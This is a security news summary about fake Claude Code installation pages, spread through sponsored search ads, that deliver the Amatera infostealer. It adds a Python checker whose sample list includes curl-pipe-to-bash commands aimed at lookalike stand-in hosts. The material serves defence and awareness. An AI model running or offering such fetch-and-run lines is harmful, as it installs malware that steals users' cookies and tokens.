Fake Claude Code installation pages spread infostealer
Briefly

"Attackers clone installation pages of developer tools such as Claude Code and replace the install commands with malware instructions. The fake pages are virtually pixel-perfect copies of the official Claude Code installation page, including layout, branding, and documentation sidebar. However, the install commands do not refer to claude.ai but to a server owned by the attacker."
"The fake pages are distributed exclusively via Google Ads, in particular via sponsored search results. Searches such as 'Claude Code install' or 'Claude Code CLI' lead victims to the malicious pages. After interacting with the page, visitors are also redirected to the real site, which removes any suspicion."
"The malware installed via the fake commands is Amatera Stealer. This infostealer first appeared in 2025 and is considered the successor to ACR Stealer. Amatera steals browser data, cookies, session tokens, and system information. The malware communicates with its command-and-control server via hardcoded IP addresses of legitimate CDNs, which makes detection difficult."
Security researchers discovered InstallFix, a sophisticated attack technique where malicious actors create near-identical copies of legitimate developer tool installation pages, particularly Claude Code. These fake pages are distributed through sponsored Google search results, appearing when users search for installation instructions. The cloned pages contain malicious install commands that deploy Amatera Stealer, an infostealer malware that harvests browser data, cookies, session tokens, and system information. After execution, users are redirected to legitimate sites, reducing suspicion. The malware communicates through hardcoded IP addresses of legitimate CDNs like Cloudflare Pages and Squarespace, complicating detection. This technique improves upon ClickFix by requiring no social engineering pretext.
Read at Techzine Global
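Because the cloned pages differ from the real one only in where the install command points, the host inside a copied one-liner is the thing to check before it reaches a shell. The following is an added example, not code from the article or from the Claude Code project: it assumes claude.ai (the only official host the page names) is the sole allowed install host, and the function names and sample commands are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: claude.ai is the only official install host (the only one the page names).
ALLOWED_HOSTS = {"claude.ai"}

# URLs with an explicit scheme; stops at whitespace, quotes and shell metacharacters.
URL_RE = re.compile(r"https?://[^\s'\"`|;<>()]+", re.IGNORECASE)

def check_url(url):
    """Return the reasons a URL should not be trusted (empty list = OK)."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").rstrip(".").lower()
    except ValueError:
        return ["URL does not parse"]
    reasons = []
    if parts.scheme.lower() != "https":
        reasons.append("not HTTPS")
    if parts.username is not None:
        reasons.append("userinfo before '@' hides the real host")
    if not host.isascii() or host.startswith("xn--") or ".xn--" in host:
        reasons.append("IDN/punycode host can imitate an ASCII name")
    if host not in ALLOWED_HOSTS:  # exact match: lookalike subdomains fail here
        reasons.append(f"host {host!r} is not on the allowlist")
    return reasons

def audit_install_command(command):
    """Map every URL in a pasted install one-liner to its list of problems."""
    return {url: check_url(url) for url in URL_RE.findall(command)}

def command_is_trusted(command):
    """Fail closed: require at least one URL, and every URL must be clean."""
    findings = audit_install_command(command)
    return bool(findings) and not any(findings.values())

# Constructed sample commands (not taken from the page or from any real campaign).
SAMPLES = [
    "curl -fsSL https://claude.ai/install.sh | bash",
    "curl -fsSL https://claude.ai.cli-setup.example/install.sh | bash",
    "curl -fsSL https://claude.ai@203.0.113.10/install.sh | bash",
    "curl -fsSL claude.ai/install.sh | bash",  # no scheme: cannot be verified
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print("TRUST " if command_is_trusted(cmd) else "REJECT", cmd)
```

The check only confirms where a command downloads from; it says nothing about the content of the script that host serves.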